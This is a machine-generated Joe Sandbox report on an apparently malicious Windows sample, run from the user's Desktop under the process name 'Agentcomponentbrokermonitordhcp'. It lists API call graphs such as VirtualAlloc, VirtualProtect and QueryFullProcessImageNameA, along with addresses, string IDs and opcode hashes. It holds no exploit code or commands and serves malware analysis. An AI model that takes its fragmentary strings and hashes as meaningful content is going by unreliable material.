                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00591FE5
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00591FF6
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00592006
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00592014
                                                                                                                      • Part of subcall function 00591FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0058B371,?,?,00000000,?,?,?), ref: 0059202F
                                                                                                                      • Part of subcall function 0059AC04: SetCurrentDirectoryW.KERNELBASE(?,0059AE72,C:\Users\user\Desktop,00000000,005C946A,00000006), ref: 0059AC08
                                                                                                                    • _wcslen.LIBCMT ref: 0059AE8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                    • String ID: <Y$C:\Users\user\Desktop
                                                                                                                    • API String ID: 521417927-1445635403
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005A97E5: GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                      • Part of subcall function 005A97E5: _free.LIBCMT ref: 005A981C
                                                                                                                      • Part of subcall function 005A97E5: SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                      • Part of subcall function 005A97E5: _abort.LIBCMT ref: 005A9863
                                                                                                                    • _abort.LIBCMT ref: 005ABB80
                                                                                                                    • _free.LIBCMT ref: 005ABBB4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                                    • String ID: p[
                                                                                                                    • API String ID: 289325740-3527190296
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: (Y$ZY
                                                                                                                    • API String ID: 2696272793-269396080
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005ABF30: GetEnvironmentStringsW.KERNEL32 ref: 005ABF39
                                                                                                                      • Part of subcall function 005ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005ABF5C
                                                                                                                      • Part of subcall function 005ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005ABF82
                                                                                                                      • Part of subcall function 005ABF30: _free.LIBCMT ref: 005ABF95
                                                                                                                      • Part of subcall function 005ABF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005ABFA4
                                                                                                                    • _free.LIBCMT ref: 005A82AE
                                                                                                                    • _free.LIBCMT ref: 005A82B5
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"^
                                                                                                                    • API String ID: 400815659-4031448657
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00591206,?), ref: 00590FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00590FF6
                                                                                                                      • Part of subcall function 00586C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00586C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00590FFF
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0058DA55,?), ref: 0058E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0058DA55,?), ref: 0058E2B1
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E467
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: UY$zY
                                                                                                                    • API String ID: 1269201914-3833174144
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E467
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: UY$pY
                                                                                                                    • API String ID: 1269201914-2932441121

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:4
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 11283 7ffd9bbcb6d1 11285 7ffd9bbcb6f0 11283->11285 11284 7ffd9bbcb836 QueryFullProcessImageNameA 11286 7ffd9bbcb894 11284->11286 11285->11284 11285->11285

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1766030626.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9bbc0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullImageNameProcessQuery
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3578328331-0

                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: a80aa5bfc48d3786a4a59c8d186a66ea9d43c30f7b6595992bbdd9d73dbd579e
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: CDE09A70F0D21E87F768A284D8613E87264EBC8340F152378DA0E933E1CE28AE098615
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: a7ccde51ffaebf982fee43da4dd1b920e211f0f70841fa5207d4da50c9dd1c1f
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 0CE01234B0930ECBE710DB94C4A46ED7761EB91751F504365C405872E9DA786788C680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction ID: f557534776b05972405a6e81e90d996b5cfcccffeda2e104784b31bf923bf554
                                                                                                                    • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction Fuzzy Hash: 46C0123062990E8FDA40BB28C888824BBA0FB4E301BDA15E0E00CCB1B1D619A9948701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction ID: 03df96d572cb0e2363337fd29e2948264d525ff763ca4bb4bab3bbab10d1dd64
                                                                                                                    • Opcode Fuzzy Hash: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction Fuzzy Hash: 33C01204F0B60E01E42031AA14360ACB1009BC4AA0FD22332C009400B1980E22CD814A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 5852acb1ef70240e99ad2f0d4199dc10a474b7bedb657f9b6f8b5838b6a9ea75
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: 74C08C3051180C8FC908EB28C884A0433A0FB09200BC20190E008C7170D219DCC4C780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f5a64914ae25fd31da42294ff160fe9016db568e9b7430061250202b17320eb
                                                                                                                    • Instruction ID: 1b05bd2e84333f0114b128ac1a5cb31506f60dbf769f37ad92b989cc1c62b7ce
                                                                                                                    • Opcode Fuzzy Hash: 3f5a64914ae25fd31da42294ff160fe9016db568e9b7430061250202b17320eb
                                                                                                                    • Instruction Fuzzy Hash: DFC08C00F0CD1A02F759A20424706BD08435F80208F8107B0E41E877DECD0C1E0212CB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction ID: 20de136cdd4e1cd028feddc6713df33b7a03a62a40454ae2639f3cbfce402fe5
                                                                                                                    • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction Fuzzy Hash: 7EB01204D5750F01E42431FA086606570409FC4190FC21370D40C401B1984D12DC0242
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage: 2.7%
                                                                                                                    Dynamic/Decrypted Code Coverage: 100%
                                                                                                                    Signature Coverage: 0%
                                                                                                                    Total number of Nodes: 6
                                                                                                                    Total number of Limit Nodes: 0
                                                                                                                    execution_graph 20048 7ffd9b7db4ba 20049 7ffd9b7db4c9 VirtualProtect 20048->20049 20051 7ffd9b7db5ae 20049->20051 20044 7ffd9b7dc491 20045 7ffd9b7dc49f VirtualAlloc 20044->20045 20047 7ffd9b7dc554 20045->20047

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_H
                                                                                                                    • API String ID: 0-1910052747

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 197 7ffd9b7db4ba-7ffd9b7db4c7 198 7ffd9b7db4c9-7ffd9b7db4d1 197->198 199 7ffd9b7db4d2-7ffd9b7db4e3 197->199 198->199 200 7ffd9b7db4e5-7ffd9b7db4ed 199->200 201 7ffd9b7db4ee-7ffd9b7db5ac VirtualProtect 199->201 200->201 205 7ffd9b7db5b4-7ffd9b7db5dc 201->205 206 7ffd9b7db5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d7000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 242 7ffd9b7dc491-7ffd9b7dc49d 243 7ffd9b7dc4a1-7ffd9b7dc4dd 242->243 244 7ffd9b7dc49f 242->244 245 7ffd9b7dc4e1-7ffd9b7dc552 VirtualAlloc 243->245 244->243 244->245 248 7ffd9b7dc55a-7ffd9b7dc582 245->248 249 7ffd9b7dc554 245->249 249->248
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d7000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 0-2679148245

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8462b8d5d978ed6730a71fdbb7805a45400c224ae1b6d28dec68799696300085
                                                                                                                    • Instruction ID: 673a9375f6cc2355bcb699328423519ec07937e785f9d8a2dab9fb437fb4a13d
                                                                                                                    • Opcode Fuzzy Hash: 8462b8d5d978ed6730a71fdbb7805a45400c224ae1b6d28dec68799696300085
                                                                                                                    • Instruction Fuzzy Hash: BF118F35B0E78D8EE722DB6888641DC7BB0EF82651F5656B7C048DB1E2D9341A49C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a50159eb190117ffe39adfd1e0d7d6ac4d191efcef49dee77ed90f3d49795bc
                                                                                                                    • Instruction ID: 3127537b55da2f0840036449e8792bc3a77efda0e5ea2ec77de0f9f4f3ecb7dc
                                                                                                                    • Opcode Fuzzy Hash: 3a50159eb190117ffe39adfd1e0d7d6ac4d191efcef49dee77ed90f3d49795bc
                                                                                                                    • Instruction Fuzzy Hash: D7018671B0A90D5FE795EB9894667F9B3D1EF9C351F05007AE84CC3192DE2468458741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d167957a3a6ee79d9bb93c829f0a2a2a01baf0ab89ce6582f7e9e480b09a27a5
                                                                                                                    • Instruction ID: b4f5acf3e3c05e02277c13f1e64851ed573baeef16d89b0ccfab120bbf785da2
                                                                                                                    • Opcode Fuzzy Hash: d167957a3a6ee79d9bb93c829f0a2a2a01baf0ab89ce6582f7e9e480b09a27a5
                                                                                                                    • Instruction Fuzzy Hash: 74018035A0E38D8FD722DB64886419C7FB0EF82744F5652E7C044DB1B2D9345A49C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7abed21daf98ba931be0167567b0b3f850c6b1b12065ae342043b072ec06ce63
                                                                                                                    • Instruction ID: f07d7271f2b6384ab7b015e3633c89eb88e7cddb7370521e0bfaca12a039558a
                                                                                                                    • Opcode Fuzzy Hash: 7abed21daf98ba931be0167567b0b3f850c6b1b12065ae342043b072ec06ce63
                                                                                                                    • Instruction Fuzzy Hash: C5017134E0E38D9FE722DBA4886419D7FB0EF42744F5543E7C048C71A2D9385A48C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6a214c7d0bfd4c0fb1ee5aafc05cdb75a035fcd081ba11a9fbe6af8534f12035
                                                                                                                    • Instruction ID: a8b0b0136258823b3d5c6bff608e8a34d9f5bb5cfd45c060402a50d599943829
                                                                                                                    • Opcode Fuzzy Hash: 6a214c7d0bfd4c0fb1ee5aafc05cdb75a035fcd081ba11a9fbe6af8534f12035
                                                                                                                    • Instruction Fuzzy Hash: EBF02B21B1DBC40FC71A5A2998654A17BF1DF5B20134A01FBD487CB2A3DD19EC858351
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c5e764543b0e4f6656d70b36b328efce14eb8897b403496decde122275b02e3f
                                                                                                                    • Instruction ID: 5281dd4750545d2eeceb98931bad018e4492c36a70bd182d83a11220e6e38cdd
                                                                                                                    • Opcode Fuzzy Hash: c5e764543b0e4f6656d70b36b328efce14eb8897b403496decde122275b02e3f
